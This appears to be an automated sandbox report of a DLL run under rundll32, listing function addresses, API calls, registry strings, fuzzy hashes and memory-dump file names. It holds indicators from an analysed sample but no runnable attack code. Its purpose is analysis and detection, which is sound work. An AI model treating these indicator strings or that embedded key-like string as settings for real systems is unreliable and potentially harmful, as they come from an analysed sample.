Opcode Fuzzy Hash: a0ac78459233da017ac87d6453e8a81be7370a52e333d62a5881ff707d93bed7
Instruction Fuzzy Hash: B951BD32701A4886EB46DF65D8403AD73B0FB49BE4F098621EB2957BE9DF38C959C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180034178 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 000000018003420F
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180034222
??3@YAXPEAX@Z.MSVCRT ref: 0000000180034235
SysFreeString.OLEAUT32 ref: 0000000180034279
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003428C
??3@YAXPEAX@Z.MSVCRT ref: 000000018003429F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
Instruction ID: d6e040c62356dd28a52f4054929385a923e12d2376c870478276763e31a13ced
Opcode Fuzzy Hash: ceda01c74325736d26a0411a727c02681ceb51477494a67f089079f3182e5468
Instruction Fuzzy Hash: 9D516F33701B4982EB469F65D85039E63A0FB89FA4F498221EB295B7D9DF38C549C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800322A0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032337
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003234A
??3@YAXPEAX@Z.MSVCRT ref: 000000018003235D
SysFreeString.OLEAUT32 ref: 00000001800323A1
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800323B4
??3@YAXPEAX@Z.MSVCRT ref: 00000001800323C7

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
Instruction ID: b9a7bc9aefba1d0cd95c21a72bfdce90d94dfcaa7ac1bda6bd9d80d9113677c1
Opcode Fuzzy Hash: 1487f1b9042455cadd1f594916249c517a85c0241772127b20d59336a7db92ce
Instruction Fuzzy Hash: 55516032701B4882EB469F65D85039E73A0FB49FE4F098625EB69577D9DF38C649C380

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003288C Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 00000001800298FC: GetFileAttributesW.KERNEL32 ref: 000000018002998C
Part of subcall function 00000001800298FC: GetFileAttributesW.KERNEL32 ref: 000000018002999E

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032923
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032936
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032949
SysFreeString.OLEAUT32 ref: 000000018003298D
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800329A0
??3@YAXPEAX@Z.MSVCRT ref: 00000001800329B3

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$AttributesFile$??2@AllocHeapProcess
String ID:
API String ID: 2343307612-0
Opcode ID: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
Instruction ID: 3edc698dfee31cca13762dbc840380725e1013da3230f8d99093220343b8c6e9
Opcode Fuzzy Hash: 8e393e3a3852b3cedc11bf39ea6ffb031ff90eabb787ce897587cb6f9badf564
Instruction Fuzzy Hash: 21515F32701B4882EB46DF65D85039D73A0FB49FA4F098225EB695B7E9DF38C949C380

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003339C Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180033433
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180033446
??3@YAXPEAX@Z.MSVCRT ref: 0000000180033459
SysFreeString.OLEAUT32 ref: 000000018003349D
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800334B0
??3@YAXPEAX@Z.MSVCRT ref: 00000001800334C3

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: cb084eac3c01a6141e65883699959179503f168564c67b856e8c6732f0b58ade
Instruction ID: 4743fcfbcc81e14f62b6d6540fd80bf8f8ac016693e437fee6067cb5d2a84381
Opcode Fuzzy Hash: cb084eac3c01a6141e65883699959179503f168564c67b856e8c6732f0b58ade
Instruction Fuzzy Hash: FE517E32701B4882EB469F65D85139E73A0FB49FE4F098225EB694B7E9DF38C549C380

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800336D0 Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

Part of subcall function 000000018000B560: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B584
Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180033767
??_V@YAXPEAX@Z.MSVCRT ref: 000000018003377A
??3@YAXPEAX@Z.MSVCRT ref: 000000018003378D
SysFreeString.OLEAUT32 ref: 00000001800337D1
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800337E4
??3@YAXPEAX@Z.MSVCRT ref: 00000001800337F7

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocHeapProcess
String ID:
API String ID: 195827-0
Opcode ID: c7e1832e4ce232530478fafb890d9703e0e225edfd70dbae23375beabdc7b3ab
Instruction ID: be5d86e730b1b0d67e88d66128df24a62b98fea8a3ed06798233462d938dce2e
Opcode Fuzzy Hash: c7e1832e4ce232530478fafb890d9703e0e225edfd70dbae23375beabdc7b3ab
Instruction Fuzzy Hash: E7518E72701B4882EB429F65D85139E73A0FB49FE4F098225EB295B7E9DF38C549C380

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180026754 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 142stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800267E9
lstrcmpiW.KERNEL32 ref: 0000000180026826

Strings

{42042206-2D85-11D3-8CFF-005004838597}, xrefs: 000000018002681B
clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\, xrefs: 0000000180026851
ShellEx\IconHandler, xrefs: 0000000180026798
\DefaultIcon, xrefs: 0000000180026863

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: lstrcmpimemset
String ID: ShellEx\IconHandler$\DefaultIcon$clsid\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\${42042206-2D85-11D3-8CFF-005004838597}
API String ID: 3784069311-1340094651
Opcode ID: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
Instruction ID: 9f0af0b831dc55336fcff299f0060eabbe44d87f67dffe850d980bb31fffbbb0
Opcode Fuzzy Hash: 0a12214a811aa3540a0b94e6fb55089740eaeb8575e012286690255a8f8d330d
Instruction Fuzzy Hash: 0251A672601E4982EB52DB29D8817DE6760FB897F4F508312FA6D436E5DF38C689C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800503B8 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180050421
ExpandEnvironmentStringsW.KERNEL32 ref: 0000000180050458
EnterCriticalSection.KERNEL32 ref: 00000001800504D4
LeaveCriticalSection.KERNEL32 ref: 000000018005051D
ExpandEnvironmentStringsW.KERNEL32 ref: 0000000180050544
LeaveCriticalSection.KERNEL32 ref: 00000001800505AF

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
String ID:
API String ID: 3103530258-0
Opcode ID: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
Instruction ID: b0c21a69e9994dd49745b429a24057b93f4d6bf7018e4c24e81fb4468a7e2a6c
Opcode Fuzzy Hash: 4711d94ae21e721216315d7d413d31c061a842b8496e77f250252f344626d692
Instruction Fuzzy Hash: 0051AF32711A4882EB82CF29D8843DE7761F789BE8F549211FE69176A5DF39C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800535E4 Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000018005364D
ExpandEnvironmentStringsW.KERNEL32 ref: 0000000180053683
EnterCriticalSection.KERNEL32 ref: 00000001800536FF
LeaveCriticalSection.KERNEL32 ref: 0000000180053748
ExpandEnvironmentStringsW.KERNEL32 ref: 000000018005376B
LeaveCriticalSection.KERNEL32 ref: 00000001800537D6

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterEnvironmentExpandLeaveStrings
String ID:
API String ID: 3103530258-0
Opcode ID: fcf2df2db5cf5e266654a243a60d583c694b8e2f7e43b235741d210c56c3b519
Instruction ID: d4c98c1f2c6f443ab10be6318f00d39910fcbf62874244d53b77e7d0f65f3854
Opcode Fuzzy Hash: fcf2df2db5cf5e266654a243a60d583c694b8e2f7e43b235741d210c56c3b519
Instruction Fuzzy Hash: E651BE72715A4886EB92CF39D8803DD7760F789BE8F449211FA69177A9CF39C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003775C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 124stringCOMMON

Download Yara Rule

APIs

StrStrIA.SHLWAPI ref: 000000018003778E
strchr.MSVCRT ref: 0000000180037845
strchr.MSVCRT ref: 0000000180037872
StrStrIA.SHLWAPI ref: 0000000180037883
StrPBrkA.SHLWAPI ref: 00000001800378DF

Strings

, xrefs: 00000001800378D5

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: strchr
String ID:
API String ID: 2830005266-178107231
Opcode ID: bc05744aff8b0383f5567bccd8194249036b1c2b3c5ae3525c55af492ab48238
Instruction ID: 65c5a2eb1091ab38a88c8a4afef7a6f5d28e655ba382c7d64d3166a1cd56c67f
Opcode Fuzzy Hash: bc05744aff8b0383f5567bccd8194249036b1c2b3c5ae3525c55af492ab48238
Instruction Fuzzy Hash: E741C33174568C80FFB78F2594483EA6791A75DFE8F5AD620E96E037C6DE2C864AC301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066808 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180066883

Part of subcall function 0000000180066608: RegOpenKeyExW.ADVAPI32 ref: 0000000180066653
Part of subcall function 0000000180066608: RegQueryValueExW.ADVAPI32 ref: 0000000180066696
Part of subcall function 0000000180066608: RegCloseKey.ADVAPI32 ref: 00000001800666AA

Strings

/elevated, xrefs: 0000000180066879
"%s" %s, xrefs: 00000001800668D4

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CloseOpenQueryValuewcsstr
String ID: "%s" %s$/elevated
API String ID: 1248106594-1382985213
Opcode ID: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
Instruction ID: f3329ece6a2879d43efc8f52936060a6c90d44f89bf07b9cf1bbe3f09b4200fa
Opcode Fuzzy Hash: 7d994b47a6feae35010406933b82370a9ece06ded3bcb5ee78e307a99859ddb1
Instruction Fuzzy Hash: E241A432702B4489EB95CF65D8407DC33A5FB88BD4F15861AAE5E53BA4DF34C659C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180068954 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 000000018006A424: RegOpenKeyExW.ADVAPI32(?,?,?,?,00000000,0000000180068993,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A44B

memset.MSVCRT ref: 00000001800689A4

Part of subcall function 000000018006A490: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,00000001800689D0,?,?,?,?,00000001,00000000,?,0000000180068D41), ref: 000000018006A4A9

Strings

Operator, xrefs: 00000001800689C1
SignData, xrefs: 0000000180068A87
ExpirationDate, xrefs: 0000000180068A4B
SOFTWARE\360MachineSignature, xrefs: 0000000180068980
IssueDate, xrefs: 0000000180068A07

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: OpenQueryValuememset
String ID: ExpirationDate$IssueDate$Operator$SOFTWARE\360MachineSignature$SignData
API String ID: 733315865-1479031278
Opcode ID: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
Instruction ID: ca32e24e8d646fa6672ed224415891838e44a9bb2fa0ab3c5403e0472a1cb0df
Opcode Fuzzy Hash: 024b379d581b3895d461dc1fafaaa22704cd15f8aacd44fa0de35045f287b812
Instruction Fuzzy Hash: DA411972B00B149AFB92DBA5D8447DD73B5BB487C8F148A16AE6853B58EF34C708CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D19C Relevance: 9.1, APIs: 6, Instructions: 112COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018000D22A
??2@YAPEAX_K@Z.MSVCRT ref: 000000018000D24F
memset.MSVCRT ref: 000000018000D270
memmove.MSVCRT ref: 000000018000D282
??3@YAXPEAX@Z.MSVCRT ref: 000000018000D2B8
memset.MSVCRT ref: 000000018000D2E4

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@memset$??3@memmove
String ID:
API String ID: 1691405456-0
Opcode ID: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
Instruction ID: 4c03d6f838081a40abf5c4ade735ff692b1a288c63e34611b63fa987e6e302c4
Opcode Fuzzy Hash: 898b7f6a28002f066823eb5036c047e985fc53dc141f5cbb7a005687aa805986
Instruction Fuzzy Hash: C7419F72311B9C81EA95CB65E5483AC73A5E748BE0F25C726AA7D07BD5DF38C289C310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052E84 Relevance: 9.1, APIs: 6, Instructions: 87networkCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180052EE6
LeaveCriticalSection.KERNEL32 ref: 0000000180052F32
WSAStartup.WS2_32 ref: 0000000180052F68
WSCUnInstallNameSpace.WS2_32 ref: 0000000180052F85
WSAGetLastError.WS2_32 ref: 0000000180052F94

Part of subcall function 00000001800432C8: memset.MSVCRT ref: 0000000180043335

WSACleanup.WS2_32 ref: 0000000180052FA1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$CleanupEnterErrorInstallLastLeaveNameSpaceStartupmemset
String ID:
API String ID: 3860525367-0
Opcode ID: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
Instruction ID: 37d746e663b56e28a6a3e394405e8b675d481f719bc3bdb0db42ce8d24bf20fd
Opcode Fuzzy Hash: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
Instruction Fuzzy Hash: 57316E31700A4886F6A29F25EC443E973A0FB8DBD5F548531B96A972A1DF39C7898700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180015128 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 327COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180011110: RegOpenKeyExW.ADVAPI32 ref: 0000000180011234
Part of subcall function 0000000180011110: RegQueryValueExW.ADVAPI32 ref: 0000000180011270
Part of subcall function 0000000180011110: RegCloseKey.ADVAPI32 ref: 0000000180011280

EnterCriticalSection.KERNEL32 ref: 00000001800151CC
LeaveCriticalSection.KERNEL32 ref: 00000001800151EC
GetTickCount.KERNEL32 ref: 0000000180015203
GetTickCount.KERNEL32 ref: 000000018001523B

Strings

dfsu11yy38277*(*6fhjsdkfds, xrefs: 0000000180015256, 0000000180015323, 00000001800153ED, 0000000180015504, 0000000180015599

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CountCriticalSectionTick$CloseEnterLeaveOpenQueryValue
String ID: dfsu11yy38277*(*6fhjsdkfds
API String ID: 4271658480-2650022146
Opcode ID: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
Instruction ID: dce0af6b373f41b2cde99525f258e7f40e176b48fd2bd51a90361080345aed67
Opcode Fuzzy Hash: 0bb96f617ef2d1086e71c411e54c36657af4b2cd300dcf6be980ec3523e171b7
Instruction Fuzzy Hash: 1DE19932200A0896EB92DB65E8443DD67A1F78DBD8F908125FE9D4B7A5DF38C789C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004B630 Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004B661
OpenProcess.KERNEL32 ref: 000000018004B67A
GetModuleFileNameExW.PSAPI ref: 000000018004B69F
CloseHandle.KERNEL32 ref: 000000018004B6A8
_wcsicmp.MSVCRT ref: 000000018004B6CB
memset.MSVCRT ref: 000000018004B6E2

Part of subcall function 0000000180064DE4: EnterCriticalSection.KERNEL32 ref: 0000000180064E2F
Part of subcall function 0000000180064DE4: GetModuleFileNameW.KERNEL32 ref: 0000000180064E51
Part of subcall function 0000000180064DE4: PathAppendW.SHLWAPI ref: 0000000180064E63
